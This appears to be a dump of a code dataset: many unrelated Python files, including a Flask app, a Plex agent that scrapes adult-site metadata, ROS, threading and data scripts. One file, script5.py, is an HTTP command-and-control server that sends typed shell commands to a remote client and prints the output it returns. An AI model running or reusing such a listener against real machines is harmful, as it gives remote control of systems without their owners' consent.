ldb.execute('insert into entries (title, text) values (?, ?)', [request.form['title'], request.form['text']])\n ldb.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n print(url_for('show_entries'))\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash('You were logged in')\n return redirect(url_for('show_entries'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/rest/user/', methods=['GET', 'PUT'])\ndef show_user_profile(username):\n # show the user profile for that user\n if request.method == 'GET':\n return json.jsonify({'user': '%s' % username})\n else:\n return 'put'\n","sub_path":"flasktemplate/flasktemplate.py","file_name":"flasktemplate.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191847955","text":"import PAsearchSites\nimport PAutils\n\n\ndef getAPIKey(siteNum):\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/en/login'\n token_key = urlparse.urlparse(url).hostname\n\n token = None\n if token_key and token_key in Dict:\n data = Dict[token_key]\n data = base64.b64decode(data).decode('UTF-8')\n if 'validUntil=' in data:\n timestamp = int(data.split('validUntil=')[1].split('&')[0])\n if timestamp > time.time():\n token = Dict[token_key]\n\n if not token:\n req = PAutils.HTTPRequest(url)\n\n if not req.ok:\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/en'\n req = PAutils.HTTPRequest(url)\n\n match = re.search(r'\\\"apiKey\\\":\\\"(.*?)\\\"', req.text)\n if match:\n token = match.group(1)\n\n if token_key and token:\n if token_key not in Dict or Dict[token_key] != token:\n Dict[token_key] = token\n Dict.Save()\n\n return token\n\n\ndef getAlgolia(url, indexName, params, referer):\n headers = {\n 'Content-Type': 'application/json',\n 'Referer': referer\n }\n params = json.dumps({'requests': [{'indexName': indexName, 'params': params}]})\n data = PAutils.HTTPRequest(url, headers=headers, params=params)\n data = data.json()\n\n return data['results'][0]['hits']\n\n\ndef search(results, lang, siteNum, searchData):\n searchData.title = searchData.encoded.replace('%20', ' ')\n sceneID = searchData.title.split(' ', 1)[0]\n if unicode(sceneID, 'UTF-8').isdigit():\n searchData.title = searchData.title.replace(sceneID, '', 1).strip()\n else:\n sceneID = None\n\n apiKEY = getAPIKey(siteNum)\n for sceneType in ['scenes', 'movies']:\n url = PAsearchSites.getSearchSearchURL(siteNum) + '?x-algolia-application-id=TSMKFA364Q&x-algolia-api-key=' + apiKEY\n if sceneID and not searchData.title:\n if sceneType == 'scenes':\n params = 'filters=clip_id=' + sceneID\n else:\n params = 'filters=movie_id=' + sceneID\n else:\n params = 'query=' + searchData.title\n\n searchResults = getAlgolia(url, 'all_' + sceneType, params, PAsearchSites.getSearchBaseURL(siteNum))\n for searchResult in searchResults:\n if sceneType == 'scenes':\n releaseDate = parse(searchResult['release_date'])\n curID = searchResult['clip_id']\n else:\n date = 'last_modified' if searchResult['last_modified'] else 'date_created'\n releaseDate = parse(searchResult[date])\n curID = searchResult['movie_id']\n\n titleNoFormatting = searchResult['title']\n releaseDate = releaseDate.strftime('%Y-%m-%d')\n\n if sceneID:\n score = 100 - Util.LevenshteinDistance(sceneID, curID)\n elif searchData.date:\n score = 100 - Util.LevenshteinDistance(searchData.date, releaseDate)\n else:\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%d|%d|%s|%s' % (curID, siteNum, sceneType, releaseDate), name='[%s] %s %s' % (sceneType.capitalize(), titleNoFormatting, releaseDate), score=score, lang=lang))\n\n return results\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneID = int(metadata_id[0])\n sceneType = metadata_id[2]\n sceneIDName = 'clip_id' if sceneType == 'scenes' else 'movie_id'\n sceneDate = metadata_id[3]\n\n apiKEY = getAPIKey(siteNum)\n\n url = PAsearchSites.getSearchSearchURL(siteNum) + '?x-algolia-application-id=TSMKFA364Q&x-algolia-api-key=' + apiKEY\n data = getAlgolia(url, 'all_' + sceneType, 'filters=%s=%d' % (sceneIDName, sceneID), PAsearchSites.getSearchBaseURL(siteNum))\n detailsPageElements = data[0]\n\n data = getAlgolia(url, 'all_scenes', 'query=%s' % detailsPageElements['url_title'], PAsearchSites.getSearchBaseURL(siteNum))\n data = sorted(data, key=lambda i: i['clip_id'])\n scenesPagesElements = list(enumerate(data, 1))\n\n # Title\n title = None\n if sceneType == 'scenes' and len(scenesPagesElements) > 1:\n for idx, scene in scenesPagesElements:\n if scene['clip_id'] == sceneID:\n title = '%s, Scene %d' % (detailsPageElements['title'], idx)\n break\n if not title:\n title = detailsPageElements['title']\n\n metadata.title = title\n\n # Summary\n metadata.summary = detailsPageElements['description'].replace('
', '\\n').replace('
', '\\n')\n\n # Studio\n if not detailsPageElements['network_name']:\n metadata.studio = detailsPageElements['studio_name']\n else:\n metadata.studio = detailsPageElements['network_name']\n\n # Tagline and Collection(s)\n metadata.collections.clear()\n for collectionName in ['studio_name', 'serie_name']:\n if collectionName in detailsPageElements:\n metadata.collections.add(detailsPageElements[collectionName])\n if (':' in detailsPageElements['title'] or '#' in detailsPageElements['title']) and len(scenesPagesElements) > 1:\n if 'movie_title' in detailsPageElements:\n metadata.collections.add(detailsPageElements['movie_title'])\n\n # Release Date\n date_object = parse(sceneDate)\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n movieGenres.clearGenres()\n for genreLink in detailsPageElements['categories']:\n genreName = genreLink['name']\n if genreName:\n movieGenres.addGenre(genreName)\n\n if sceneType == 'movies':\n for idx, scene in scenesPagesElements:\n for genreLink in scene['categories']:\n genreName = genreLink['name']\n if genreName:\n movieGenres.addGenre(genreName)\n\n # Actors\n movieActors.clearActors()\n female = []\n male = []\n for actorLink in detailsPageElements['actors']:\n actorName = actorLink['name']\n\n actorData = getAlgolia(url, 'all_actors', 'filters=actor_id=' + actorLink['actor_id'], PAsearchSites.getSearchBaseURL(siteNum))[0]\n if 'pictures' in actorData and actorData['pictures']:\n max_quality = sorted(actorData['pictures'].keys())[-1]\n actorPhotoURL = 'https://images-fame.gammacdn.com/actors' + actorData['pictures'][max_quality]\n else:\n actorPhotoURL = ''\n\n if actorLink['gender'] == 'female':\n female.append((actorName, actorPhotoURL))\n else:\n male.append((actorName, actorPhotoURL))\n\n combined = female + male\n for actor in combined:\n movieActors.addActor(actor[0], actor[1])\n\n # Posters\n if not PAsearchSites.getSearchBaseURL(siteNum).endswith(('girlsway.com', 'puretaboo.com')):\n art.append('https://images-fame.gammacdn.com/movies/{0}/{0}_{1}_front_400x625.jpg'.format(detailsPageElements['movie_id'], detailsPageElements['url_title'].lower().replace('-', '_')))\n if 'url_movie_title' in detailsPageElements:\n art.append('https://images-fame.gammacdn.com/movies/{0}/{0}_{1}_front_400x625.jpg'.format(detailsPageElements['movie_id'], detailsPageElements['url_movie_title'].lower().replace('-', '_')))\n\n if 'pictures' in detailsPageElements and detailsPageElements['pictures']:\n max_quality = detailsPageElements['pictures']['nsfw']['top'].keys()[0]\n pictureURL = 'https://images-fame.gammacdn.com/movies/' + detailsPageElements['pictures'][max_quality]\n\n if sceneType == 'movies':\n art.append(pictureURL)\n else:\n art.insert(0, pictureURL)\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n # Download image file for analysis\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100 and width > height:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return metadata\n","sub_path":"Contents/Code/networkGammaEntOther.py","file_name":"networkGammaEntOther.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631944895","text":"import json\nimport nibabel as nib\nimport numpy as np\nimport sys\nimport os\n\ndef print_volume(roi,img,voxel_vol):\n\tmask= img == int(roi['label']) \n\tmasked_cc = np.ma.array(img, mask=np.logical_not(mask),fill_value = 0)\n\tvol=len(masked_cc.compressed())*voxel_vol\n\tprint(\"volume:\",vol,\" mm3 for label\",roi['label'])\n\treturn vol\n\nlabel_vol_path=sys.argv[1]\nlabel=sys.argv[2]\nicc = int(sys.argv[3])\n\ntry:\n\tos.mkdir(\"output\")\nexcept:\n\tpass\n\nlut=[]\nmeas=[]\n\n# Load mask\ncc_parc_img = nib.load(label_vol_path)\ncc_parc_data = cc_parc_img.get_data()\n# Arrange the array to be in RAS+ space\nornt=nib.orientations.axcodes2ornt(nib.aff2axcodes(cc_parc_img.affine))\ncc_parc_data=nib.orientations.apply_orientation(cc_parc_data, ornt)\n\nvxl_size=cc_parc_img.get_header().get_zooms()\n\nroi = {}\nroi[\"label\"]=label\n\nmeas = print_volume(roi,cc_parc_data,vxl_size[0]*vxl_size[1]*vxl_size[2])\n\nwith open('/output/measurement.json', 'w') as f:\n\tjson.dump(meas,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement2.json', 'w') as f:\n json.dump(meas/icc,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement3.json', 'w') as f:\n json.dump((meas/5)/icc,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement4.json', 'w') as f:\n json.dump(meas/5,f,indent=4, separators=(',', ': '))\n\n","sub_path":"src/pydra_volume_test.py","file_name":"pydra_volume_test.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489135301","text":"import threading\nimport time\n\n\ndef some_job(name: str):\n time.sleep(1) # our work done here\n print(name)\n\n\nname_tmpl = 'Thread {}'\nthreads = []\nMAX = 4\n\nfor i in range(MAX):\n name = name_tmpl.format(i)\n t = threading.Thread(target=some_job, args=(name, ))\n threads.append(t)\n\nfor t in threads: # may be in a previous loop\n t.start()\n\nfor t in threads:\n t.join()\n","sub_path":"examples/01_threading.py","file_name":"01_threading.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635767243","text":"#!/usr/bin/env python\nimport rospy\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nimport utils\nfrom basics.msg import Images\n\nclass Image_Subscriber(object):\n\n\n\tdef __init__(self):\n\t\tself.bridge = CvBridge()\n\n\tdef spin(self):\n\t\trospy.init_node('listener', anonymous=True)\n\t\trospy.Subscriber(\"imagesAndPixelsum\", Images, self.show_message)\n\t\trospy.spin()\t\t\t\n\n\tdef show_image(self, image, window, type='bgr8'):\n\t\tcv_image = utils.convert_image_ros_to_cv(\n\t\t\t\t\tself.bridge, image, type)\n\t\tcv2.imshow(window, cv_image)\n\n\n\tdef show_message(self, msg):\n\t\tself.show_image(msg.rgb, 'RGB')\n\t\tself.show_image(msg.grayscale, 'grayscale' ,'8UC1')\n\t\trospy.loginfo(msg.numberofpixels)\n\t\tcv2.waitKey(1)\n\nif __name__ == \"__main__\":\n\tsub = Image_Subscriber()\n\tsub.spin()","sub_path":"Assignment1/report/src/3/scripts/image_subscriber.py","file_name":"image_subscriber.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577055632","text":"from loader import load_input\nfrom .common import single_differing_index\nimport os\n\n\ndef run():\n lines = load_input(os.path.join(os.path.dirname(__file__), 'input.txt'))\n for i in range(0, len(lines)):\n a = lines[i].strip()\n for b in lines[i+1:]:\n b = b.strip()\n index = single_differing_index(a, b)\n if index is not False:\n return 'Index: %d, A letter: %s, B letter: %s, A: %s, B: %s' % (index, a[index], b[index], a, b)\n\n return 'Nothing :('\n","sub_path":"day02/part02.py","file_name":"part02.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637048766","text":"[H,P] = [int(x) for x in input().split()]\r\nE = list(range(H))\r\nE.reverse()\r\nC = []\r\nD = []\r\n \r\ndef move(n, source, target, idle, steps):\r\n if n>0:\r\n steps = move(n-1, source, idle, target, steps)\r\n if steps <= 0:\r\n return steps\r\n \r\n \r\n steps -= 1\r\n target.append(source.pop())\r\n if steps <= 0:\r\n return steps\r\n \r\n \r\n steps = move(n-1,idle, target, source, steps)\r\n if steps <= 0:\r\n return steps\r\n \r\n return steps\r\n \r\nmove(H, E, D, C, P)\r\nprint (\"%i %i %i\" %(len(E), len(C), len (D)))\r\n \r\n","sub_path":"Lista 6 E.py","file_name":"Lista 6 E.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323373046","text":"import http.server\nimport os\nimport cgi\n\nHOST_NAME = \"192.168.42.85\"\nPORT_NUMBER = 8080\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n command = input(\"shell> \")\n self.send_response(200)\n self.send_header(\"Content-type\",\"text/html\")\n self.end_headers()\n self.wfile.write(command.encode())\n \n def do_POST(self):\n self.send_response(200)\n self.end_headers()\n length = int(self.headers['Content-length']) \n postVar = self.rfile.read(length)\n print(postVar.decode())\n\nif __name__ == \"__main__\":\n server_class = http.server.HTTPServer\n httpd = server_class((HOST_NAME,PORT_NUMBER),MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n print(\"server is terminated\")\n httpd.server_close()\n","sub_path":"script5.py","file_name":"script5.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592162433","text":"from bppy import *\nimport itertools\nfrom q_learning import *\nimport pygame\nimport time\nfrom bp_env import BPEnv\n#from bp_env_goal import BPGoalEnv\n\n\nmust_finish = \"must_finish\"\nstate = \"state\"\npygame_settings = {\n \"display\": False\n}\nmap_settings = {}\n\n\ndef action_to_new_location(action, i, j):\n if action == \"Up\":\n return i - 1, j\n if action == \"Down\":\n return i + 1, j\n if action == \"Left\":\n return i, j - 1\n if action == \"Right\":\n return i, j + 1\n\n\ndef event_to_new_location(event):\n return action_to_new_location(action=event.name, **event.data)\n\n\ndef event_to_2_steps_trajectory(event):\n i, j = event_to_new_location(event)\n return event_to_new_location(BEvent(event.name, {\"i\": i, \"j\": j}))\n\n\ndef new_location_to_events(i, j):\n return [BEvent(\"Up\", {\"i\": i+1, \"j\": j}),\n BEvent(\"Down\", {\"i\": i-1, \"j\": j}),\n BEvent(\"Left\", {\"i\": i, \"j\": j+1}),\n BEvent(\"Right\", {\"i\": i, \"j\": j-1})]\n\n\ndef is_adjacent(l1, l2):\n terms = list()\n terms.append(l1[0] == l2[0] and l1[1] == l2[1]+1)\n terms.append(l1[0] == l2[0] and l1[1] == l2[1]-1)\n terms.append(l1[0] == l2[0]+1 and l1[1] == l2[1])\n terms.append(l1[0] == l2[0]-1 and l1[1] == l2[1])\n return sum(terms) == 1\n\n\ndef find_adjacent_objects(list_1, list_2):\n return [(l1, l2) for l1 in list_1 for l2 in list_2 if is_adjacent(l1, l2)]\n\ndef find_adjacent_boxes(location, l):\n return [(location, l2) for l2 in l if is_adjacent(location, l2)]\n\n\ndef block_action(neighbors_list):\n def predicate(event):\n p1 = event_to_new_location(event)\n p2 = event_to_2_steps_trajectory(event)\n return (p1, p2) in neighbors_list or (p2, p1) in neighbors_list\n return predicate\n\n\n@b_thread\ndef player(i, j):\n directions = [\"Up\", \"Down\", \"Left\", \"Right\"]\n while True:\n e = yield {request: [BEvent(d, {\"i\": i, \"j\": j}) for d in directions], state: str(i)+\"_\"+str(j)}\n i, j = event_to_new_location(e)\n\n@b_thread\ndef wall():\n global walls_list\n block_list = list(itertools.chain(*[new_location_to_events(i, j) for i, j in walls_list])) # use event_to_new_location(e)\n yield {block: block_list}\n\n@b_thread\ndef boxes():\n global box_list, walls_list, target_list\n while True:\n neighbors_list = find_adjacent_objects(box_list, walls_list) + \\\n find_adjacent_objects(box_list, box_list)\n double_object_movement = EventSet(block_action(neighbors_list))\n box_list_state = \"_\".join([str(i) for b in box_list for i in b])\n all_targets_full = sorted(box_list) == sorted(target_list)\n e = yield {block: double_object_movement, waitFor: All(), state: box_list_state, must_finish: not all_targets_full}\n new_player_location = event_to_new_location(e)\n if new_player_location in box_list:\n new_box_location = event_to_2_steps_trajectory(e)\n box_list.remove(new_player_location)\n box_list.append(new_box_location)\n\n@b_thread\ndef box(i, j):\n global box_list, walls_list, target_list\n while True:\n neighbors_list = find_adjacent_boxes((i, j), walls_list) + \\\n find_adjacent_boxes((i, j), box_list)\n double_object_movement = EventSet(block_action(neighbors_list))\n box_state = str(i) + \"_\" + str(j)\n box_in_target = (i, j) in target_list\n e = yield {block: double_object_movement, waitFor: All(), state: box_state,\n must_finish: not box_in_target}\n new_player_location = event_to_new_location(e)\n if new_player_location == (i, j):\n new_box_location = event_to_2_steps_trajectory(e)\n box_list.remove(new_player_location)\n box_list.append(new_box_location)\n i, j = new_box_location\n\n\n@b_thread\ndef map_printer(map):\n if pygame_settings[\"display\"]:\n\n main_surface = pygame.display.set_mode((32 * len(map[0]), 32 * len(map)))\n count = 0\n while True:\n # Look for an event from keyboard, mouse, joystick, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT: # Window close button clicked?\n break\n # Completely redraw the surface, starting with background\n main_surface.fill((255, 255, 255))\n for i in range(len(map)):\n for j in range(len(map[i])):\n # Copy our image to the surface, at this (x,y) posn\n main_surface.blit(map_dict[map[i][j]], (j * 32, i * 32))\n # Now that everything is drawn, put it on display!\n pygame.display.flip()\n time.sleep(0.5)\n #print(count)\n count += 1\n\n e = yield {waitFor: All()}\n\n map = \",\".join(map).replace(\"a\", \" \").split(\",\")\n map = \",\".join(map).replace(\"A\", \"t\").split(\",\")\n i, j = event_to_new_location(e)\n if map[i][j] == \"b\" or map[i][j] == \"B\":\n i2, j2 = event_to_2_steps_trajectory(e)\n if map[i2][j2] == \"t\":\n map[i2] = map[i2][:j2] + \"B\" + map[i2][j2 + 1:]\n else:\n map[i2] = map[i2][:j2] + \"b\" + map[i2][j2 + 1:]\n if map[i][j] == \"b\":\n map[i] = map[i][:j] + \"a\" + map[i][j+1:]\n else:\n map[i] = map[i][:j] + \"A\" + map[i][j + 1:]\n elif map[i][j] == \"t\":\n map[i] = map[i][:j] + \"A\" + map[i][j + 1:]\n else:\n map[i] = map[i][:j] + \"a\" + map[i][j + 1:]\n else:\n yield {waitFor: All()}\n\n\n# run\ndef find(map, ch):\n return [(i, j) for i, row in enumerate(map) for j, c in enumerate(row) if c == ch]\n\n\nwalls_list = []\nbox_list = []\ntarget_list = []\n\n\n\nmap_dict = {\n \" \": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/floor.png\"), (32,32)),\n \"X\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/wall.png\"), (32,32)),\n \"b\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box.png\"), (32,32)),\n \"B\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box_on_target.png\"), (32,32)),\n \"a\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/player.png\"), (32,32)),\n \"A\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/player_on_target.png\"), (32,32)),\n \"t\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box_target.png\"), (32,32))\n}\n\n\ndef init_bprogram():\n global walls_list, box_list, target_list\n map = map_settings[\"map\"]\n walls_list = find(map, \"X\")\n box_list = find(map, \"b\") + find(map, \"B\")\n empty_target_list = find(map, \"t\") + find(map, \"A\")\n full_target_list = find(map, \"B\")\n target_list = empty_target_list + full_target_list\n player_locations = find(map, \"a\") + find(map, \"A\")\n player_location = player_locations[0]\n\n bthreads_list = [player(*player_location), wall(), map_printer(map)] + [box(*l) for l in box_list]\n return BProgram(bthreads=bthreads_list, event_selection_strategy=SimpleEventSelectionStrategy())\n\n\nfrom bp_env import BPEnv\nimport random\nfrom gym import spaces\nfrom bp_action_space import BPActionSpace\n\n\ndef gym_env_generator(episode_timeout):\n global walls_list, box_list, target_list\n _ = init_bprogram()\n env = BPEnv()\n env.set_bprogram_generator(init_bprogram)\n action_mapper = {0: \"Up\", 1: \"Down\", 2: \"Left\", 3: \"Right\"}\n env.action_mapper = action_mapper\n env.action_space = spaces.Discrete(action_mapper.__len__())\n env.observation_space = spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]])\n env.episode_timeout = episode_timeout\n return env\n\ndef gym_goal_env_generator(episode_timeout):\n global walls_list, box_list, target_list\n _ = init_bprogram()\n env = BPGoalEnv()\n env.set_bprogram_generator(init_bprogram)\n action_mapper = {0: \"Up\", 1: \"Down\", 2: \"Left\", 3: \"Right\"}\n env.action_mapper = action_mapper\n env.action_space = spaces.Discrete(action_mapper.__len__())\n env.observation_space = spaces.Dict({\n 'observation': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]]),\n 'achieved_goal': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]]),\n 'desired_goal': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]])\n })\n env.episode_timeout = episode_timeout\n return env\n\n","sub_path":"sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99681660","text":"puntuaction = {'.',',','!','?',' '}\ndef palindrome(s):\n i,j=0,len(s)-1\n while i < j:\n #ignore puntuactions\n while i$ = {avgT:.2f} K')\nax.set_xlabel('Time, (ps)')\nax.set_ylabel(r'$T$, (K)')\nax.legend(loc='upper right')\nax.grid()\nplt.tight_layout()\nplt.savefig('task1_T_traj.png')\nplt.show()","sub_path":"computational_materials_and_molecular_physics/HW3/task1/plt_task1.py","file_name":"plt_task1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187184264","text":"# regression to identify the trend\nimport statsmodels.api as sm\nfrom statsmodels.regression.rolling import RollingOLS\nfrom main import pd\nimport os\n\ndef strategy(df, symbol):\n x = sm.add_constant(df.index)\n df['tp'] = (df['High'] + df['Low'] + df['Close']) / 3\n y = df['tp']\n window = 12 * 2\n rols = RollingOLS(y, x, window=window)\n rres = rols.fit()\n\n params = rres.params\n params.columns = [f\"const_{window}\", f\"beta_{window}\"]\n\n rsquared = rres.rsquared\n rsquared.name = f'r2_{window}'\n\n df = pd.concat([df, params, rsquared], axis=1)\n\n df['buy_significance'] = df[f'r2_{window}'] > 0.7\n df['buy_beta'] = df[f'beta_{window}'] < 0\n df['buy_signal'] = df['buy_beta'] & df['buy_significance']\n\n window = 12\n rols = RollingOLS(y, x, window=window)\n rres = rols.fit()\n\n params = rres.params\n params.columns=[f\"const_{window}\", f\"beta_{window}\"]\n\n rsquared = rres.rsquared\n rsquared.name = f'r2_{window}'\n\n df = pd.concat([df, params, rsquared], axis=1)\n\n df['sell_significance'] = df[f'r2_{window}'] > 0.7\n df['sell_beta'] = df[f'beta_{window}'] > 0\n df['sell_signal'] = df['sell_beta'] & df['sell_significance']\n\n df = df.drop(df[(df.buy_signal == False) & (df.sell_signal == False)].index)\n\n file_count = 0\n if os.path.isfile(f\"back_test_data/{symbol}({file_count}).csv\"):\n file_count += 1\n\n df.to_csv(f\"back_test_data/{symbol}({file_count}).csv\", index=False)\n return df","sub_path":"strategy_05.py","file_name":"strategy_05.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438081370","text":"import json\nimport unittest\nfrom app import app\nfrom ..user.models import User\nfrom ..store.store import store\n\nclass BaseAPITestSetUp (unittest.TestCase):\n def setUp(self):\n self.helper = TestHelper(app.test_client())\n store.init_db()\n default_admin = {\n 'username': 'admin',\n 'password': 'admin_pass',\n 'role': 'admin'\n }\n user = User(default_admin)\n store.add(user)\n\n def tearDown(self):\n store.drop_db()\n\n\n\nclass TestHelper():\n def __init__(self, test_client):\n self.base_url = 'http://127.0.0.1:8080'\n self.headers = {'content-type': 'application/json'}\n self.client = test_client\n\n def authenticate (self, login_data):\n url = f'{self.base_url}/users/auth'\n res = self.client.post(url, data=json.dumps(login_data), headers=self.headers)\n # return the token\n return json.loads(res.data.decode('utf8'))['token']\n\n def add_user (self, user_data, token):\n url = f'{self.base_url}/users'\n return self.client.post(\n url,\n data=json.dumps(user_data),\n headers={ **self.headers, 'token': token }\n )\n\n def add_product (self, product_data, token):\n url = f'{self.base_url}/products'\n return self.client.post(\n url,\n data=json.dumps(product_data),\n headers={ **self.headers, 'token': token }\n )\n\n def get_products (self, token):\n url = f'{self.base_url}/products'\n return self.client.get(url, headers={ **self.headers, 'token': token })\n","sub_path":"app/shared/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207274447","text":"import logging\nimport os\nfrom sqlalchemy import Column, ForeignKey, Integer, String, DateTime, Boolean\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sqlite3\nfrom dateutil.parser import parse\n\nBase = declarative_base()\n\nclass BundleId(Base):\n __tablename__ = 'bundle_ids'\n id = Column(Integer, primary_key=True)\n native_id = Column(String(250))\n\nclass App(Base):\n __tablename__ = 'apps'\n id = Column(Integer, primary_key=True)\n title = Column(String(250))\n bundle_id = Column(String(250), ForeignKey('bundle_ids.id'), sqlite_on_conflict_unique='IGNORE')\n url = Column(String(250))\n developer = Column(String(250))\n genre = Column(String(250))\n content_rating = Column(String(250))\n content_rating_description = Column(String(250))\n contains_ads = Column(Boolean)\n installs = Column(String(250))\n privacy_policy = Column(String(250))\n\nclass Review(Base):\n __tablename__ = 'reviews'\n id = Column(Integer, primary_key=True)\n app_id = Column(Integer, ForeignKey('apps.id'))\n content = Column(String(500))\n review_native_id = Column(String(500), sqlite_on_conflict_unique='IGNORE')\n created_at = Column(DateTime)\n score = Column(Integer)\n reply_content = Column(String(500))\n\ndef init():\n engine = create_engine('sqlite:///combined.db')\n Base.metadata.create_all(engine)\n\n Base.metadata.bind = engine\n\n DBSession = sessionmaker(bind=engine)\n session = DBSession()\n return session\n\n\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Exception as e:\n print(e)\n\n return conn\n\ndef select_all(conn,session):\n \"\"\"\n Query all rows in the tasks table\n :param conn: the Connection object\n :return:\n \"\"\"\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM apps\")\n apps = cur.fetchall()\n\n for app in apps:\n a = App(\n title = app[1],\n bundle_id = app[2],\n url = app[3],\n developer = app[4],\n genre = app[5],\n content_rating = app[6],\n content_rating_description = app[7],\n contains_ads = app[8],\n installs = app[9],\n privacy_policy = app[10]\n )\n session.add(a)\n session.commit()\n session.refresh(a)\n\n cur = conn.cursor()\n cur.execute(f\"SELECT * FROM reviews where app_id={a.id}\")\n reviews = cur.fetchall()\n for r in reviews:\n r = Review(\n app_id = a.id,\n content = r[2],\n review_native_id = r[3],\n created_at = parse(r[4]),\n score = r[5],\n reply_content = r[6]\n )\n session.add(r)\n session.commit()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM bundle_ids\")\n bundles = cur.fetchall()\n\n for b in bundles:\n b_id = BundleId(native_id=b[1])\n session.add(b_id)\n session.commit()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM bundle_ids\")\n bundles = cur.fetchall()\n\nif __name__ == '__main__':\n session = init()\n conn = create_connection('reviews.db')\n select_all(conn, session)\n\n conn = create_connection('pof_reviews.db')\n select_all(conn, session)\n","sub_path":"combine_dbs.py","file_name":"combine_dbs.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2605221","text":"import psycopg2\n\nfrom db_connector import DBManipulator\nimport random\nimport uuid\n\nfrom psycopg2.extras import execute_batch\n\nfrom mimesis.enums import Gender\nfrom mimesis import Generic\nfrom mimesis import Datetime\n\ng = Generic('en')\nd = Datetime('en')\n\nusers_count = 500000//20\ncategories_count = 5000//20\nmessages_count = 10000000//20\n\n\n# users_count = 5\n# categories_count = 10\n# messages_count = 10\n\n\ndef create_users(count):\n result = [{'id': create_uuid(), 'name': g.person.full_name(gender=Gender.FEMALE)} for i in range(count)]\n return result\n\n\ndef create_categories(count):\n result = [{'id': create_uuid(), 'name': g.text.title(), 'parent_id': create_uuid()} for i in range(count)]\n return result\n\n\ndef create_messages(count, users, categories):\n result = [{'id': create_uuid(),\n 'text': g.text.text(quantity=1),\n 'category_id': categories[random.randint(0, len(categories) - 1)].get('id'),\n 'posted_at': d.datetime(2000, 2020),\n 'author_id': users[random.randint(0, len(users)) - 